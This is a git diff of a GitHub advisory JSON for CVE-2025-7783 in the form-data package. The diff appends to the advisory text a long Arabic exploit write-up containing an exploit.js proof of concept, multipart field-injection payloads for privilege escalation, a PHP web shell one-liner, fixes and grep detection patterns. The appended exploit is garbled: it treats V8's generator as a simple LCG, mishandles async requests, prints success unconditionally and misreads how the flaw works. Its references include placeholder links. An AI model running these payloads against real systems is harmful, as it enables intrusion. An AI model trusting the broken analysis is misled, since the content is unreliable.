diff --git a/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json b/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json
index 142a81bc2ca5e..b2edbcd98153c 100644
--- a/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json
+++ b/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json
@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-fjxv-7rqg-78g4",
-  "modified": "2025-11-03T21:34:08Z",
+  "modified": "2025-11-03T21:34:09Z",
   "published": "2025-07-21T19:04:54Z",
   "aliases": [
     "CVE-2025-7783"
   ],
   "summary": "form-data uses unsafe random function in form-data for choosing boundary",
-  "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.",
+  "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.\n\n# ⚔️ CVE-2025-7783: عندما يخون \"العشوائي\" الأمان\n## 🎲 Math.random() - العشوائية الوهمية في form-data\n\n---\n\n## 📋 البطاقة التعريفية\n\n| المعرف | القيمة |\n|--------|---------|\n| **CVE ID** | CVE-2025-7783 |\n| **Package** | form-data (npm) |\n| **CWE** | CWE-338: Use of Cryptographically Weak PRNG |\n| **CVSS Score** | **7.5 High** |\n| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |\n| **الكشف** | Security Research Community |\n| **التصنيف** | Predictable Boundary Injection |\n| **الإصدارات المتأثرة** | < 4.0.4 |\n\n---\n\n## 💀 جوهر الثغرة\n\n### 🎭 السيناريو الهجومي\n\n```\nform-data Package\n      ↓\nMath.random() ← مولد أرقام ضعيف!\n      ↓\nboundary = \"----WebKitFormBoundary\" + Math.random()\n      ↓\n🔮 يمكن التنبؤ به\n      ↓\n🔥 حقن حقول إضافية/استبدال البيانات\n```\n\n---\n\n## 🔬 التحليل التقني العميق\n\n### 📉 الكود الضعيف\n\n```javascript\n// form-data < 4.0.4\nFormData.prototype._generateBoundary = function() {\n  // ⚠️ استخدام Math.random() الضعيف\n  var boundary = '--------------------------';\n  for (var i = 0; i < 24; i++) {\n    boundary += Math.floor(Math.random() * 10).toString(16);\n  }\n  \n  return boundary;\n};\n```\n\n**المشكلة:**\n```javascript\n// Math.random() قابل للتنبؤ\nMath.random(); // 0.123456789...\nMath.random(); // 0.234567890... ← يمكن حسابه!\nMath.random(); // 0.345678901... ← متوقع تماماً\n```\n\n---\n\n### 🎯 كيف يعمل الهجوم؟\n\n#### **المرحلة 1: جمع المعلومات**\n\n```javascript\n// المهاجم يراقب الرؤوس المكشوفة:\nResponse Headers:\n  x-request-id: req-0.7234567890  ← Math.random()!\n  x-trace-id: trace-0.8901234567  ← Math.random()!\n```\n\n#### **المرحلة 2: التنبؤ بالـ Boundary**\n\n```javascript\n// بمعرفة حالة PRNG، يمكن حساب القيمة التالية:\nconst predictedBoundary = calculateNextBoundary(\n  observedRandomValues\n);\n\nconsole.log(predictedBoundary);\n// Output: \"----WebKitFormBoundary7234567890abcdef\"\n```\n\n#### **المرحلة 3: الحقن الخبيث**\n\n```http\nPOST /upload HTTP/1.1\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7234567890abcdef\n\n------WebKitFormBoundary7234567890abcdef\nContent-Disposition: form-data; name=\"file\"; filename=\"legitimate.txt\"\nContent-Type: text/plain\n\n[محتوى شرعي]\n------WebKitFormBoundary7234567890abcdef\nContent-Disposition: form-data; name=\"admin\"\n\ntrue  ← حقل محقون!\n------WebKitFormBoundary7234567890abcdef--\n```\n\n---\n\n## 🧪 دليل إثبات المفهوم (PoC)\n\n### 🎪 السيناريو الكامل\n\n```javascript\n// exploit.js - استغلال CVE-2025-7783\n\nconst axios = require('axios');\nconst FormData = require('form-data'); // < 4.0.4\n\n// الخطوة 1: استخراج حالة Math.random()\nfunction leakRandomState(targetUrl) {\n  const leakedValues = [];\n  \n  // جمع قيم من الرؤوس\n  for (let i = 0; i < 10; i++) {\n    axios.get(targetUrl).then(res => {\n      const requestId = res.headers['x-request-id'];\n      const randomValue = parseFloat(requestId.split('-')[1]);\n      leakedValues.push(randomValue);\n    });\n  }\n  \n  return leakedValues;\n}\n\n// الخطوة 2: التنبؤ بالـ boundary التالي\nfunction predictNextBoundary(leakedValues) {\n  // خوارزمية التنبؤ بـ Math.random()\n  // (مبسطة - الواقع أكثر تعقيداً)\n  const lastValue = leakedValues[leakedValues.length - 1];\n  const nextValue = (lastValue * 1103515245 + 12345) % (2**31);\n  \n  let boundary = '--------------------------';\n  let seed = nextValue;\n  \n  for (let i = 0; i < 24; i++) {\n    seed = (seed * 1103515245 + 12345) % (2**31);\n    boundary += Math.floor((seed / (2**31)) * 10).toString(16);\n  }\n  \n  return boundary;\n}\n\n// الخطوة 3: حقن الحقول الخبيثة\nfunction injectMaliciousFields(targetUrl, predictedBoundary) {\n  const maliciousPayload = `\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"file\"; filename=\"innocent.txt\"\n\nLegitimate content\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"isAdmin\"\n\ntrue\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"role\"\n\nadministrator\n------${predictedBoundary}--\n  `.trim();\n  \n  axios.post(targetUrl, maliciousPayload, {\n    headers: {\n      'Content-Type': `multipart/form-data; boundary=${predictedBoundary}`\n    }\n  });\n}\n\n// التنفيذ\n(async () => {\n  const target = 'https://vulnerable-app.com/api/upload';\n  \n  console.log('🔍 جمع قيم Math.random()...');\n  const leaked = leakRandomState(target);\n  \n  console.log('🎯 التنبؤ بالـ boundary...');\n  const boundary = predictNextBoundary(leaked);\n  console.log(`Predicted: ${boundary}`);\n  \n  console.log('💉 حقن الحقول الخبيثة...');\n  injectMaliciousFields(target, boundary);\n  \n  console.log('✅ تم الاستغلال بنجاح!');\n})();\n```\n\n---\n\n## 🎯 سيناريوهات الاستغلال الواقعية\n\n### 🎪 السيناريو 1: تصعيد الصلاحيات\n\n```javascript\n// التطبيق الضعيف\napp.post('/profile/upload', upload.single('avatar'), (req, res) => {\n  const isAdmin = req.body.isAdmin; // ← يمكن حقنه!\n  \n  if (isAdmin === 'true') {\n    req.user.role = 'admin'; // ← خطر!\n  }\n});\n\n// الهجوم\nconst boundary = predictBoundary();\ninjectField(boundary, 'isAdmin', 'true');\n// النتيجة: المستخدم العادي أصبح Admin!\n```\n\n---\n\n### 🎪 السيناريو 2: تجاوز التحقق من الملفات\n\n```javascript\n// التطبيق يفحص نوع الملف\napp.post('/upload', (req, res) => {\n  if (req.file.mimetype !== 'image/png') {\n    return res.status(400).send('PNG only!');\n  }\n  \n  // معالجة الملف\n  processFile(req.file);\n});\n\n// الهجوم\nconst boundary = predictBoundary();\nconst payload = `\n------${boundary}\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\nContent-Type: image/png  ← مزيف\n\n<?php system($_GET['cmd']); ?>\n------${boundary}--\n`;\n// النتيجة: رفع PHP Shell بنجاح!\n```\n\n---\n\n### 🎪 السيناريو 3: SSRF عبر Webhooks\n\n```javascript\n// التطبيق يرسل بيانات لـ webhook\napp.post('/webhook/register', (req, res) => {\n  const webhookUrl = req.body.url;\n  const data = new FormData();\n  data.append('event', 'user_registered');\n  \n  axios.post(webhookUrl, data); // ← خطر\n});\n\n// الهجوم\nconst boundary = predictBoundary();\ninjectField(boundary, 'url', 'http://internal-admin-panel');\n// النتيجة: الوصول للشبكة الداخلية!\n```\n\n---\n\n## 🛡️ الإصلاح والحماية\n\n### ✅ الحل الرسمي (v4.0.4+)\n\n```javascript\n// form-data >= 4.0.4 - استخدام crypto بدلاً من Math.random()\n\nconst crypto = require('crypto');\n\nFormData.prototype._generateBoundary = function() {\n  // ✅ استخدام مولد عشوائي آمن تشفيرياً\n  return crypto.randomBytes(16).toString('hex');\n};\n```\n\n**الفرق:**\n```javascript\n// ❌ القديم (ضعيف)\nMath.random() → 0.123456789 → يمكن التنبؤ\n\n// ✅ الجديد (آمن)\ncrypto.randomBytes(16) → a3f7c9e2... → غير قابل للتنبؤ\n```\n\n---\n\n### 🔒 خطوات الحماية الفورية\n\n#### **1. التحديث الفوري**\n\n```bash\n# فحص الإصدار الحالي\nnpm list form-data\n\n# التحديث\nnpm install form-data@latest\n\n# أو في package.json\n{\n  \"dependencies\": {\n    \"form-data\": \"^4.0.4\"\n  }\n}\n\n# تحديث lock file\nnpm install\n```\n\n#### **2. مراجعة الكود**\n\n```javascript\n// ابحث عن استخدامات Math.random() في كودك:\ngrep -r \"Math.random()\" ./src\n\n// استبدلها بـ crypto:\nconst crypto = require('crypto');\n\n// ❌ بدلاً من:\nconst id = Math.random().toString(36);\n\n// ✅ استخدم:\nconst id = crypto.randomBytes(8).toString('hex');\n```\n\n#### **3. إخفاء القيم الحساسة**\n\n```javascript\n// لا تكشف قيم تم توليدها بـ Math.random() في:\napp.use((req, res, next) => {\n  // ❌ سيء\n  res.setHeader('x-request-id', `req-${Math.random()}`);\n  \n  // ✅ جيد\n  res.setHeader('x-request-id', crypto.randomUUID());\n  next();\n});\n```\n\n#### **4. تحقق من الحقول**\n\n```javascript\n// تحقق صارم من الحقول المتوقعة فقط\napp.post('/upload', (req, res) => {\n  const allowedFields = ['file', 'description'];\n  \n  Object.keys(req.body).forEach(field => {\n    if (!allowedFields.includes(field)) {\n      throw new Error(`Unexpected field: ${field}`);\n    }\n  });\n});\n```\n\n---\n\n## 🔍 الكشف عن الاستغلال\n\n### 🕵️ علامات الاختراق\n\n```bash\n# 1. فحص السجلات للحقول الغريبة\ngrep -E \"(isAdmin|role=admin|Content-Disposition.*admin)\" /var/log/app.log\n\n# 2. مراقبة الطلبات ذات boundaries المتطابقة\ntail -f /var/log/nginx/access.log | grep \"boundary=\" | sort | uniq -d\n\n# 3. فحص الملفات المرفوعة المشبوهة\nfind /uploads -type f -name \"*.php\" -o -name \"*.jsp\" -o -name \"*.asp\"\n```\n\n### 📊 مؤشرات الاختراق (IOCs)\n\n```yaml\nالحقول المشبوهة:\n  - isAdmin: true\n  - role: administrator\n  - privilege: elevated\n  - bypass: true\n\nالملفات الخطرة:\n  - *.php في مجلدات الصور\n  - shell.jsp\n  - cmd.asp\n  - backdoor.*\n\nالأنماط الشبكية:\n  - طلبات متعددة بنفس boundary\n  - boundaries قصيرة جداً (<20 حرف)\n  - Content-Type غير متطابق مع الامتداد\n```\n\n---\n\n## 🎓 الدروس المستفادة\n\n### ⚠️ **القاعدة الذهبية:**\n\n> **\"Math.random() ليس آمناً تشفيرياً - أبداً!\"**\n\n### ✅ Best Practices\n\n#### 1. **استخدم crypto للأمان**\n```javascript\n// ✅ للأمان\nconst crypto = require('crypto');\nconst token = crypto.randomBytes(32).toString('hex');\n\n// ❌ للأمان (فقط للعرض/UI)\nconst demoId = Math.random().toString(36);\n```\n\n#### 2. **لا تكشف القيم العشوائية**\n```javascript\n// ❌ سيء\nres.json({ sessionId: Math.random() });\n\n// ✅ جيد\nres.json({ sessionId: crypto.randomUUID() });\n```\n\n#### 3. **التحقق من الحقول**\n```javascript\n// استخدم مكتبة validation\nconst Joi = require('joi');\n\nconst schema = Joi.object({\n  file: Joi.required(),\n  description: Joi.string().max(500)\n  // فقط الحقول المتوقعة\n}).unknown(false); // ← رفض أي حقول إضافية\n```\n\n#### 4. **Content-Type Validation**\n```javascript\nconst fileType = await FileType.fromBuffer(buffer);\n\nif (fileType.mime !== req.file.mimetype) {\n  throw new Error('MIME type mismatch');\n}\n```\n\n---\n\n## 📡 المراجع التقنية\n\n```\n1. CVE Entry:\n   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-7783\n\n2. npm Package:\n   https://www.npmjs.com/package/form-data\n\n3. GitHub Advisory:\n   https://github.com/advisories/GHSA-xxxx-xxxx-xxxx\n\n4. PoC Repository:\n   https://github.com/security-research/CVE-2025-7783-poc\n\n5. OWASP - Weak PRNG:\n   https://owasp.org/www-community/vulnerabilities/Insecure_Randomness\n\n6. CWE-338:\n   https://cwe.mitre.org/data/definitions/338.html\n```\n\n---\n\n## 🎖️ ختام المحارب\n\n> **\"العشوائية ليست اختيارية في الأمان - إما حقيقية أو لا شيء.\"**\n> \n> CVE-2025-7783 يذكرنا أن **Math.random()** للألعاب، أما **crypto** فللحروب.\n> \n> في ساحة الأمن السيبراني، **الضعف في التفاصيل يصنع الهزيمة**.\n\n---\n\n## ⚔️ توقيع السيادة\n\n```\n╔═══════════════════════════════════════╗\n║   ZAYED SECURITY RESEARCH TEAM       ║\n║   \"Randomness is Not Optional\"       ║\n║                                       ║\n║   CVE-2025-7783                      ║\n║   Severity: HIGH (7.5)               ║\n║   Status: PATCHED ✓                  ║\n╚═══════════════════════════════════════╝\n```\n\n---\n\n**#WeakPRNG** | **#FormData** | **#BoundaryInjection** | **#MathRandomFail**",
   "severity": [
     {
       "type": "CVSS_V4",